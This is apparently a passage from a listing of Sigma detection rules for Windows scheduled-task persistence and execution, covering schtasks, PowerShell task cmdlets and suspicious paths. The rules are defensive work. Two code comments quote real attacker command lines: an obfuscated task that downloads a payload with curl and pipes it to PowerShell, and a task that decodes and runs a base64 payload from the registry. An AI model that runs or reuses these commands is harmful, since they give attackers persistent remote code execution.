- ' SYSTEM' # SYSTEM is a valid value for schtasks hence it gets it's own value with space
- 'HIGHEST'
condition: all of selection_* and not 1 of filter_*
falsepositives:
- Legitimate processes that run at logon. Filter according to your environment
level: high
high
Uncommon One Time Only Scheduled Task At 00:00
Detects scheduled task creation events that include suspicious actions, and is run once at 00:00
status testauthor pH-T (Nextron Systems)id 970823b7-273b-460a-8afc-3a6811998529
view Sigma YAML
title: Uncommon One Time Only Scheduled Task At 00:00
id: 970823b7-273b-460a-8afc-3a6811998529
status: test
description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00
references:
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte
author: pH-T (Nextron Systems)
date: 2022-07-15
modified: 2023-02-03
tags:
- attack.execution
- attack.persistence
- attack.privilege-escalation
- attack.t1053.005
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|contains: '\schtasks.exe'
- OriginalFileName: 'schtasks.exe'
selection_cli:
CommandLine|contains:
- 'wscript'
- 'vbscript'
- 'cscript'
- 'wmic '
- 'wmic.exe'
- 'regsvr32.exe'
- 'powershell'
- '\AppData\'
selection_time:
CommandLine|contains|all:
- 'once'
- '00:00'
condition: all of selection_*
falsepositives:
- Software installation
level: high
medium
Potential Persistence Via Microsoft Compatibility Appraiser
Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks.
In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key.
status testauthor Sreemanid f548a603-c9f2-4c89-b511-b089f7e94549
view Sigma YAML
title: Potential Persistence Via Microsoft Compatibility Appraiser
id: f548a603-c9f2-4c89-b511-b089f7e94549
related:
- id: 73a883d0-0348-4be4-a8d8-51031c2564f8
type: derived
status: test
description: |
Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks.
In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key.
references:
- https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/
author: Sreeman
date: 2020-09-29
modified: 2023-02-10
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
logsource:
product: windows
category: process_creation
detection:
selection_img:
- Image|endswith: '\schtasks.exe'
- OriginalFileName: 'schtasks.exe'
selection_cli:
CommandLine|contains|all:
- 'run '
- '\Application Experience\Microsoft Compatibility Appraiser'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
medium
Powershell Create Scheduled Task
Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code
status testauthor frack113id 363eccc0-279a-4ccf-a3ab-24c2e63b11fb
view Sigma YAML
title: Powershell Create Scheduled Task
id: 363eccc0-279a-4ccf-a3ab-24c2e63b11fb
status: test
description: Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task
author: frack113
date: 2021-12-28
modified: 2025-10-07
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection_cmdlet:
ScriptBlockText|contains:
- 'New-ScheduledTaskAction'
- 'New-ScheduledTaskTrigger'
- 'New-ScheduledTaskPrincipal'
- 'New-ScheduledTaskSettingsSet'
- 'New-ScheduledTask'
- 'Register-ScheduledTask'
selection_cimmethod:
ScriptBlockText|contains|all:
- 'Invoke-CimMethod'
- '-ClassName'
- 'PS_ScheduledTask'
- '-NameSpace'
- 'Root\Microsoft\Windows\TaskScheduler'
filter_main_legitimate_scripts:
ScriptBlockText|contains|all:
- 'Microsoft.PowerShell.Core\Export-ModuleMember'
- 'Microsoft.Management.Infrastructure.CimInstance'
- '__cmdletization_methodParameter'
condition: 1 of selection_* and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
medium
Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE
Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware
status testauthor Florian Roth (Nextron Systems)id 81325ce1-be01-4250-944f-b4789644556f
view Sigma YAML
title: Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE
id: 81325ce1-be01-4250-944f-b4789644556f
related:
- id: 43f487f0-755f-4c2a-bce7-d6d2eec2fcf8 # TODO: Recreate after baseline
type: derived
status: test
description: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware
references:
- https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/
- https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04
- https://blog.talosintelligence.com/gophish-powerrat-dcrat/
author: Florian Roth (Nextron Systems)
date: 2022-02-21
modified: 2025-10-07
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.t1053.005
logsource:
product: windows
category: process_creation
detection:
selection_1_create:
Image|endswith: '\schtasks.exe'
CommandLine|contains|windash: ' /create '
selection_1_all_folders:
CommandLine|contains:
- ':\Perflogs'
- ':\Users\All Users\'
- ':\Users\Default\'
- ':\Users\Public'
- ':\Windows\Temp'
- '\AppData\Local\'
- '\AppData\Roaming\'
- '%AppData%'
- '%Public%'
selection_2_parent:
ParentCommandLine|endswith: '\svchost.exe -k netsvcs -p -s Schedule'
selection_2_some_folders:
CommandLine|contains:
- ':\Perflogs'
- ':\Windows\Temp'
- '\Users\Public'
- '%Public%'
filter_optional_other:
- ParentCommandLine|contains: 'unattended.ini'
- CommandLine|contains: 'update_task.xml'
filter_optional_team_viewer:
CommandLine|contains: '/Create /TN TVInstallRestore /TR'
filter_optional_avira_install:
# Comment out this filter if you dont use AVIRA
CommandLine|contains|all:
- '/Create /Xml '
- '\Temp\.CR.'
- '\Avira_Security_Installation.xml'
filter_optional_avira_other:
# Comment out this filter if you dont use AVIRA
CommandLine|contains|all:
- '/Create /F /TN'
- '/Xml '
- '\Temp\'
- 'Avira_'
CommandLine|contains:
- '.tmp\UpdateFallbackTask.xml'
- '.tmp\WatchdogServiceControlManagerTimeout.xml'
- '.tmp\SystrayAutostart.xml'
- '.tmp\MaintenanceTask.xml'
filter_optional_klite_codec:
CommandLine|contains|all:
- '\Temp\'
- '/Create /TN "klcp_update" /XML '
- '\klcp_update_task.xml'
condition: ( all of selection_1_* or all of selection_2_* ) and not 1 of filter_optional_*
falsepositives:
- Benign scheduled tasks creations or executions that happen often during software installations
- Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders
level: medium
medium
Scheduled Task Creation with Curl and PowerShell Execution Combo
Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.
This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.
status experimentalauthor Swachchhanda Shrawan Poudel (Nextron Systems)id 1d174d38-8fda-4081-a9b6-56d9763c0cd8
view Sigma YAML
title: Scheduled Task Creation with Curl and PowerShell Execution Combo
id: 1d174d38-8fda-4081-a9b6-56d9763c0cd8
status: experimental
description: |
Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.
This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.
references:
- https://tria.ge/241015-l98snsyeje/behavioral2
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-02-05
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.stealth
- attack.t1053.005
- attack.t1218
- attack.command-and-control
- attack.t1105
logsource:
category: process_creation
product: windows
detection:
# Example: cmd start /min /c schtasks /create /tn PolicyConverter /sc minute /mo 15 /tr "conhost --headless cmd /v:on /c set a=https&set b=inh&set c=ostne&set d=tservice.co&set e=!a!://www.!b!!c!!d!m& curl -o - !e!/mscu/lokc.php?wl=HGNBWBGW**Admin | powershell" /rl Highest
selection_img:
Image|endswith: '\schtasks.exe'
CommandLine|contains|windash: ' /create '
selection_curl:
CommandLine|contains|all:
- 'curl '
- 'http'
- '-o'
selection_powershell:
CommandLine|contains: 'powershell'
condition: all of selection_*
falsepositives:
- Legitimate use of schtasks for administrative purposes.
- Automation scripts combining curl and PowerShell in controlled environments.
level: medium
medium
Scheduled Task Executed From A Suspicious Location
Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task
status testauthor Nasreddine Bencherchali (Nextron Systems)id 424273ea-7cf8-43a6-b712-375f925e481f
view Sigma YAML
title: Scheduled Task Executed From A Suspicious Location
id: 424273ea-7cf8-43a6-b712-375f925e481f
status: test
description: Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task
references:
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-05
modified: 2023-02-07
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
logsource:
product: windows
service: taskscheduler
definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is disabled by default and needs to be enabled in order for this detection to trigger'
detection:
selection:
EventID: 129 # Created Task Process
Path|contains:
- 'C:\Windows\Temp\'
- '\AppData\Local\Temp\'
- '\Desktop\'
- '\Downloads\'
- '\Users\Public\'
- 'C:\Temp\'
# If you experience FP. Uncomment the filter below and add the specific TaskName with the Program to it
# filter:
# TaskName: '\Exact\Task\Name'
# Path: 'Exact\Path'
condition: selection
falsepositives:
- Unknown
level: medium
medium
Scheduled Task Executed Uncommon LOLBIN
Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task
status testauthor Nasreddine Bencherchali (Nextron Systems)id f0767f15-0fb3-44b9-851e-e8d9a6d0005d
view Sigma YAML
title: Scheduled Task Executed Uncommon LOLBIN
id: f0767f15-0fb3-44b9-851e-e8d9a6d0005d
status: test
description: Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task
references:
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-05
modified: 2023-02-07
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
logsource:
product: windows
service: taskscheduler
definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is disabled by default and needs to be enabled in order for this detection to trigger'
detection:
selection:
EventID: 129 # Created Task Process
Path|endswith:
- '\calc.exe'
- '\cscript.exe'
- '\mshta.exe'
- '\mspaint.exe'
- '\notepad.exe'
- '\regsvr32.exe'
# - '\rundll32.exe'
- '\wscript.exe'
# filter_system:
# Path|endswith: '\rundll32.exe'
# TaskName|startswith: '\Microsoft\Windows\'
# condition: selection and not 1 of filter_*
condition: selection
falsepositives:
- False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule
level: medium
medium
Scheduled Task Executing Payload from Registry
Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
status testauthor X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)id 86588b36-c6d3-465f-9cee-8f9093e07798
view Sigma YAML
title: Scheduled Task Executing Payload from Registry
id: 86588b36-c6d3-465f-9cee-8f9093e07798
related:
- id: c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78
type: derived
status: test
description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
references:
- https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2023-07-18
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
- attack.t1059.001
logsource:
product: windows
category: process_creation
detection:
selection_img:
# schtasks.exe /Create /F /TN "{97F2F70B-10D1-4447-A2F3-9B070C86E261}" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\Pvoeooxf).yzbbvhhdypa))) " /SC MINUTE /MO 30
- Image|endswith: '\schtasks.exe'
- OriginalFileName: 'schtasks.exe'
selection_cli_create:
CommandLine|contains: '/Create'
selection_cli_get:
CommandLine|contains:
- 'Get-ItemProperty'
- ' gp ' # Alias
selection_cli_hive:
CommandLine|contains:
- 'HKCU:'
- 'HKLM:'
- 'registry::'
- 'HKEY_'
filter_main_encoding:
CommandLine|contains:
- 'FromBase64String'
- 'encodedcommand'
condition: all of selection_* and not 1 of filter_*
falsepositives:
- Unknown
level: medium
medium
Suspicious Scheduled Task Creation via Masqueraded XML File
Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence
status testauthor Swachchhanda Shrawan Poudel, Elastic (idea)id dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c
view Sigma YAML
title: Suspicious Scheduled Task Creation via Masqueraded XML File
id: dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c
status: test
description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence
references:
- https://learn.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml-
- https://github.com/elastic/protections-artifacts/blob/084067123d3328a823b1c3fdde305b694275c794/behavior/rules/persistence_suspicious_scheduled_task_creation_via_masqueraded_xml_file.toml
author: Swachchhanda Shrawan Poudel, Elastic (idea)
date: 2023-04-20
modified: 2024-12-01
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.stealth
- attack.t1036.005
- attack.t1053.005
logsource:
product: windows
category: process_creation
detection:
selection_img:
- Image|endswith: '\schtasks.exe'
- OriginalFileName: 'schtasks.exe'
selection_cli_create:
CommandLine|contains:
- '/create'
- '-create'
selection_cli_xml:
CommandLine|contains:
- '/xml'
- '-xml'
filter_main_extension_xml:
CommandLine|contains: '.xml'
filter_main_system_process:
IntegrityLevel:
- 'System'
- 'S-1-16-16384'
filter_main_rundll32:
ParentImage|endswith: '\rundll32.exe'
ParentCommandLine|contains|all:
- ':\WINDOWS\Installer\MSI'
- '.tmp,zzzzInvokeManagedCustomActionOutOfProc'
filter_optional_third_party:
ParentImage|endswith:
# Consider removing any tools that you don't use to avoid blind spots
- ':\ProgramData\OEM\UpgradeTool\CareCenter_*\BUnzip\Setup_msi.exe'
- ':\Program Files\Axis Communications\AXIS Camera Station\SetupActions.exe'
- ':\Program Files\Axis Communications\AXIS Device Manager\AdmSetupActions.exe'
- ':\Program Files (x86)\Zemana\AntiMalware\AntiMalware.exe'
- ':\Program Files\Dell\SupportAssist\pcdrcui.exe'
condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Unknown
level: medium
medium
Suspicious Scheduled Task Name As GUID
Detects creation of a scheduled task with a GUID like name
status testauthor Nasreddine Bencherchali (Nextron Systems)id ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b
view Sigma YAML
title: Suspicious Scheduled Task Name As GUID
id: ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b
status: test
description: Detects creation of a scheduled task with a GUID like name
references:
- https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/
- https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-31
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.t1053.005
logsource:
product: windows
category: process_creation
detection:
selection_img:
Image|endswith: '\schtasks.exe'
CommandLine|contains: '/Create '
selection_tn:
CommandLine|contains:
# Can start with single or double quote
- '/TN "{'
- "/TN '{"
- "/TN {"
selection_end:
CommandLine|contains:
# Ending of the name to avoid possible FP in the rest of the commandline
- '}"'
- "}'"
- '} '
condition: all of selection_*
falsepositives:
- Legitimate software naming their tasks as GUIDs
level: medium
medium
Suspicious Schtasks Schedule Type With High Privileges
Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type
status testauthor Nasreddine Bencherchali (Nextron Systems)id 7a02e22e-b885-4404-b38b-1ddc7e65258a
view Sigma YAML
title: Suspicious Schtasks Schedule Type With High Privileges
id: 7a02e22e-b885-4404-b38b-1ddc7e65258a
related:
- id: 24c8392b-aa3c-46b7-a545-43f71657fe98
type: similar
status: test
description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type
references:
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-31
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.t1053.005
logsource:
product: windows
category: process_creation
detection:
selection_img:
- Image|endswith: '\schtasks.exe'
- OriginalFileName: 'schtasks.exe'
selection_time:
CommandLine|contains:
- ' ONLOGON '
- ' ONSTART '
- ' ONCE '
- ' ONIDLE '
selection_privs:
CommandLine|contains:
- 'NT AUT' # This covers the usual NT AUTHORITY\SYSTEM
- ' SYSTEM' # SYSTEM is a valid value for schtasks hence it gets it's own value with space
- 'HIGHEST'
condition: all of selection_*
falsepositives:
- Some installers were seen using this method of creation unfortunately. Filter them in your environment
level: medium
low
Scheduled Task Creation Via Schtasks.EXE
Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
status testauthor Florian Roth (Nextron Systems)id 92626ddd-662c-49e3-ac59-f6535f12d189
view Sigma YAML
title: Scheduled Task Creation Via Schtasks.EXE
id: 92626ddd-662c-49e3-ac59-f6535f12d189
status: test
description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
references:
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create
author: Florian Roth (Nextron Systems)
date: 2019-01-16
modified: 2025-10-22
tags:
- attack.execution
- attack.persistence
- attack.privilege-escalation
- attack.t1053.005
- attack.s0111
- car.2013-08-001
- stp.1u
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\schtasks.exe'
CommandLine|contains: ' /create '
filter_main_system_user:
User|contains: # covers many language settings
- 'AUTHORI'
- 'AUTORI'
filter_optional_msoffice:
# schtasks.exe /Create /tn "Microsoft\Office\Office Performance Monitor" /XML "C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\Microsoft_Office_Office Performance Monitor.xml"
ParentImage:
- 'C:\Program Files\Microsoft Office\root\integration\integrator.exe'
- 'C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe'
Image:
- 'C:\Windows\System32\schtasks.exe'
- 'C:\Windows\SysWOW64\schtasks.exe'
CommandLine|contains: 'Microsoft\Office\Office Performance Monitor'
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Administrative activity
- Software installation
level: low